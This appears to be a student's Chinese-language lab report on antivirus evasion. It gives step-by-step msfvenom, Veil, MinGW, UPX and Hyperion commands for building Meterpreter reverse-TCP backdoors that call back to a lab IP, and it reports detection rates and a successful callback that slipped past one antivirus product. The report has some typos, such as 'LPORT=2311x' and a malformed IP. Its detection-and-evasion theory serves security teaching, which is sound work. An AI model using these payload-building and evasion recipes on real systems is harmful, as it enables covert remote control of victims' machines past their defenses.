免殺原理與實踐

實驗內容

1.正確使用msf編碼器，通過msfvenom生成如jar或者exe等多種類型的其他文件和它們的編碼多次版本
2.下載veil學習它的使用，并嘗試使用它生成惡意代碼
3.使用C+shellcode編程生成惡意文件
4.嘗試upx壓縮殼以及hyp加密殼，組合應用各種技術實現惡意代碼免殺
5.在殺軟開啟時，運用免殺技術使得惡意代碼可以在另一臺主機上運行回連至本機

實驗過程

一、免殺效果的測試基準

• 在虛擬機中使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.181.129 PORT=2311 -f exe > met20232311.exe用msfvenom生成一個Windows可執行payload的命令，指定了Meterpreter的reverse_tcp負載，將嘗試反向連接回指定的主機與端口，輸出為一個名為met20232311.exe的可執行文件
  
• 將該文件放入virustotal進行評價，觀察檢出率為59/72，以這個比例作為參照，查看后續的免殺技術效果
  

二、過msfvenom生成如jar或者exe等多種類型的其他文件和它們的編碼多次版本

1.生成.exe文件和它的編碼多次版本

• 利用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.181.129 LPORT=2311 -f exe > met-encoded20232311.exe使用msfvenom生成一個經過shikata_ga_nai編碼、排除了空字節的Windows可執Meterpreter反向TCP載荷，輸出到met-encoded20232311.exe文件
  
  可以觀察到檢出率為59/72，基本沒變化，效果不好
  
• 單次編碼效果不好，再利用指令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.181.129 LPORT=2311-f exe > met-10encoded20232311.exe進行多次編碼,其中-i 10表示編碼10次
  
  可以觀察到文案金檢出率為58/72，仍然與基準類似，，免殺效果不好
  
  說明上述方法幾乎沒有起到免殺的效果

2.生成.jar文件和它的編碼多次版本

• 使用命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.181.129 LPORT=2311x>metjar20232311.jar用msfvenom生成一個針對Java平臺的Meterpreter反向TCP載荷，配置回連地址與端口，并把生成的JAR二進制寫入metjar20222408.jar
  
  再使用命令msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.181.1129 LPORT=2311x>met-encoded-jar20232311.jar對載荷應用shikata_ga_nai編碼并重復編碼10次，最后把輸出寫入met-encoded-jar20222408.jar
  
• 兩種方法得出的檢出率均為35/64，可以得出對比.exe文件，.jar文件本身更不易被檢測出來，但是進不進行編碼效果差別不大
  
  

3.生成.php文件和它的編碼多次版本

• 使用命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.181.129 LPORT=2311 x> metphp_20232311.php用msfvenom生成一個針對PHP環境的Meterpreter反向TCP載荷，配置回連的主機與端口，并把生成的PHP文件寫入metphp_20222408.php，接著使用指令msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.181.129 LPORT=2311x> met_encoded10_php_20232311.php測試編碼10次的免殺效果
  
• 觀察不編碼和編碼十次的檢出率分別是25/62和8/62，說明不僅php文件本身就更不易被識別出來而且對其編碼之后免殺效果更好
  
  

三、嘗試使用veil免殺工具

1.下載veil工具

• 保證內存空間足夠的前提下先使用指令sudo apt -y install veil，用apt下載veil
  
• 利用veil自帶的shell腳本配置好環境usr/share/veil/config/setup.sh --force --silent
  

2.使用veil工具

• 下載完成查看veil有如下界面，說明系統中加載了2個工具，分別是Evasion（用于生成規避殺毒軟件的惡意payload）和Ordnance（用于生成各種攻擊載荷）。含有的可用命令包括exit（完全退出Veil）、info（查看特定工具的信息）、list（列出可用工具）、options（顯示Veil配置）、update（更新Veil）、use（使用特定工具）。這里選用use 1進行試驗
  
  
• 根據提示輸入list查看所有可用載荷
  
• 這里可以查到c/meterpreter/rev_tcp.py是第7個選項，它可以生成基于C語言的reverse_tcp類型Meterpreter payload，所以使用use 7
  
• 進行配置，輸入以下信息

set LHOST 192.168.181.129（反彈鏈接ip，虛擬機的ip）
set LPORT 2311(設置端口)
generate(開始生成)

• 接下來會提示生成的具體內容和生成后文件所在的位置
  
• 在所示目錄下可以找到生成完成的文件payload20232311.exe
  
• 測試文件的檢出率為36/72，有一定的免殺效果
  

四、使用C + shellcode編程

• 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.181.129 LPORT=2311 -f c用msfvenom生成一個針對Windows的meterpreter反向TCP載荷，指定回連監聽地址為192.168.181.129與端口2311，并以C源代碼格式輸出（-f c）
  
• 用生成的shellcode編寫一個測試用的C文件并使用指令i686-w64-mingw32-g++ shellcode_20232311.c -o shellcode_20232311.exe將C源文件shellcode_20232311.c編譯鏈接成Windows可執行文件shellcode_20232311.exe
  
  
• 測試文件的檢出率為36/72，有一定的免殺效果
  

五、嘗試加殼工具

1.使用upx壓縮殼

• 使用指令upx shellcode_20232311.exe -o shellcode_upx_20232311.exe，給上一個步驟生成的shellcode_20232311.exe進行壓縮打包
  
• 檢測文件的檢出率為39/72，居然上升了，說明壓縮殼特征已經被廣泛記錄
  

2.使用hyp加密殼

• 使用指令cp shellcode_20232311.exe /usr/share/windows-resources/hyperion/將待加密文件放到工作目錄下，
  cd /usr/share/windows-resources/hyperion進入工作目錄，
  wine hyperion.exe -v shellcode_20232311.exe shellcode_hyp_20232311.exe用wine運行Windows程序hyperion.exe，以verbose模式對shellcode_20232311.exe進行加密處理并輸出為shellcode_hyp_20232311.exe
  
  
  
• 對文件進行檢測，檢出率為52/72，依舊是反而上升，說明這個殼也被廣泛記錄。Hyperion加密殼免殺效果不如UPX，推測是因為其加密邏輯和殼代碼特征較固定，易被殺軟收錄識別；而 UPX通過壓縮破壞原始代碼靜態特征，且壓縮算法多樣、本身屬中性技術，殺軟更難直接判定惡意性，因此免殺表現更優
  

六、綜合應用技術實現惡意代碼免殺

• 使用msfvenom工具來生成一個攻擊載荷的示例。該攻擊載荷被x86/shikata_ga_nai編碼了10次。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.181.129 LPORT=2311 -f c >20232311zfz.c，并使用nano在生成的文件中加入main函數如下
  
• 使用MinGW-w64編譯該源文件i686-w64-mingw32-g++ 20232311zfz.c -o 20232311zfz.exe
  
• 使用hyperion加一層加密殼
  
• 使用upx加一層壓縮殼
  
  
• 對上面兩步進行調換順序處理即先壓縮再加密，生成另一份文件
  • 先upx壓縮
    
  • 再hyp加密
    
    
    
• 將最終生成的兩份可執行文件放入主機，用金山毒霸進行掃描，軟件沒有發現，使用的毒霸版本如下
  
  
• 使用火絨安全就可以查出來，但是查出20232311zfz_hyp_upx.exe的時間顯著久于查出20232311zfz_upx_hyp.exe的時間。
  
• 查閱資料分析得出先使用Hyperion再使用UPX的順序免殺效果更優，核心原因在于二者的技術特性與組合邏輯的適配性：Hyperion作為加密加殼工具，能通過加密原始程序代碼段并添加解密外殼，從根本上隱藏惡意代碼的核心靜態特征，而UPX 作為特征相對通用、易被識別的壓縮加殼工具，更適合作為外層處理。按“先Hyp后UPX”的順序操作時，Hyperion先完成對核心惡意代碼的加密混淆，阻斷殺軟對原始特征的直接識別，隨后UPX對“Hyperion加密外殼+加密后代碼”的整體進行壓縮，既能進一步混淆Hyperion外殼的固定特征，又能形成“加密+壓縮”的雙重防護，且二者均需在內存中完成解密與解壓的復雜流程，大幅提升了動態行為分析的難度。反之，若先使用UPX，其明顯的壓縮頭、簽名等通用特征會提前暴露，即便后續用Hyperion加密，殺軟仍可通過識別UPX特征鎖定可疑文件，進而對其外層加密殼進行重點檢測，導致“UPX+未知殼”的組合特征成為被查殺的突破口，最終降低整體免殺概率。

七、在另一臺電腦實測回連

• 嘗試對上一步中得到的較難檢出的20232311zfz_hyp_upx.exe進行回連檢測，在kali虛擬機中輸入msfconsole打開msf的控制臺，輸入以下這些信息。

use exploit/multi/handler(設置監聽處理器)
set payload windows/meterpreter/reverse_tcp（設置載荷類型）
set LHOST 192.168.181.129（設置為kali的ip地址）
set LPORT 2311（設置端口）
exploit（啟動監聽服務）

在虛擬機windows10上運行生成的可執行文件，可以看到成功回連成功。

• 但是似乎運行一次就會被記錄，再次運行就會被檢出并被刪除

問題及解決方案

問題1

• 問題1：下載veil時出現如下報錯提示無法定位
  
• 問題1解決方案：先更新軟件包列表（確保源索引最新），接著安裝veil依賴并添加專用源sudo apt install -y git curl
  

問題2

• 問題2：測試回連的時候發現在windows10虛擬機下無法運行后門程序出現如下報錯
  
• 問題2解決方案：將主機的該文件復制進虛擬機
  

問題3

• 問題3：其實一開始我是先嘗試進行先壓縮再加密的，但是得到的文件一直不能運行。于是進行嘗試，發現只進行壓縮和只進行加密的文件都可以運行
  
  
• 問題3解決方案：發現好像有點解決不出來，于是嘗試先加密再壓縮，發現可以運行并回連，結果如第六部分。詢問ai得到答復：這是因為UPX是壓縮加殼工具，主要是壓縮程序代碼和數據段，對程序原有結構改動較小，加殼后程序通常能正常運行。而Hyperion是加密加殼工具，會修改程序的入口點、重定位表等關鍵結構。如果先UPX再Hyperion，UPX壓縮后的結構可能與Hyperion的加密結構不兼容，導致Hyperion無法正確識別程序信息，運行時出錯；但如果先 Hyperion再UPX，UPX只是對“Hyperion外殼+加密代碼”整體進行壓縮，不需要深入識別內部結構，所以程序能正常運行。

問題回答

1.殺軟是如何檢測出惡意代碼的？

• 總體上，現代安全產品通過多層檢測來識別惡意程序，主要手段有：
  • 簽名/特征匹配（靜態）：對比文件字節序列、哈希、已知惡意代碼片段或“YARA/規則”庫；對已知樣本檢出率高且速度快。
  • 啟發式與規則（靜態）：根據代碼結構、導入函數、PE/格式異常、可疑字符串或其它靜態特征打分判斷可疑度。
  • 行為檢測/動態分析：在沙箱或實時監控中觀察程序行為（如修改注冊表、啟動網絡回連、進程注入、創建持久化機制等），基于行為模型判定惡意性。
  • 機器學習/統計模型：把大量文件的靜態與動態特征喂給模型，識別未知但類似的惡意樣本（側重模式而非精確簽名）。
  • 信譽/云查驗：上傳文件元數據或樣本到云服務比對信譽、傳播范圍、提交歷史等；結合多引擎結果做綜合評分。
  • 沙箱回放與深度取證：對疑似樣本做深入執行追蹤、API調用鏈分析、網絡流量抓取等，輔助人工或自動決策。

2.免殺是做什么？

• 通過改變樣本的外觀或行為，使之避開簽名、混淆行為特征或延緩被監測到的時間

3.免殺的基本方法有哪些？

• 代碼混淆/加密：將可執行代碼或腳本通過混淆、加密或自解密包裝，改變靜態字節特征，增加分析難度。
• 打包/加殼：使用壓縮器或殼程序把原始可執行文件封裝起來，運行時解壓/解密；這會改變文件結構，影響靜態檢測。
• 多態/變形：每次生成的二進制在字節級或代碼結構上都不相同，避免基于固定簽名的檢測。
• 使用“合法”載體或腳本語言：通過宏、腳本、JAR、PHP等較少被嚴格靜態掃描的載體承載惡意邏輯，或利用常見工具/腳本來隱藏行為。
• 代碼簽名/偽裝與社會工程學：偽造或濫用合法簽名、修改圖標/文件名或采用可信外觀降低用戶懷疑，從而繞過部分基于用戶交互的防護。

學習感悟、思考

• 本次實驗讓我對“免殺”這一概念有了更直觀的認識。過去在書本上看到的只是原理性的描述，而通過親自使用msfvenom、Veil、UPX、Hyperion等工具，我真正體會到免殺不僅僅是“讓病毒不被查到”，而是涉及編碼、加殼、混淆、文件類型變化等一系列技術手段的綜合運用。實驗中我嘗試了多次編碼、跨語言生成載荷、再到使用壓縮殼與加密殼組合處理，每一步結果都不完全相同，這讓我意識到免殺技術并非“堆疊越多越好”，而是要找到合適的順序與方式。雖然某些方法的檢出率下降不明顯，但整個過程讓我更加理解殺毒軟件的檢測邏輯和靜態、動態分析的區別，也學會了如何更系統地驗證實驗效果。
• 此外，這次實驗也讓我更加理解到攻防對抗是一種持續演變的過程。通過多次生成與測試不同類型的載荷，我發現所謂的“免殺”并不是一勞永逸的結果，而是與殺毒引擎的更新、特征碼識別以及行為檢測機制息息相關。某些在本地環境下能正常運行的樣本，在上傳到VirusTotal后卻被多個引擎識別，這種差異讓我意識到實驗結果必須具體問題具體分析，不能只看“成功率”。在不斷嘗試的過程中，我也逐漸掌握了如何分析失敗原因、調整參數與結構，讓實驗更具針對性和邏輯性。總體來說，這次實踐讓我從“照搬命令”轉向“理解原理”，不僅提高了動手能力，也培養了更謹慎、系統的實驗思維。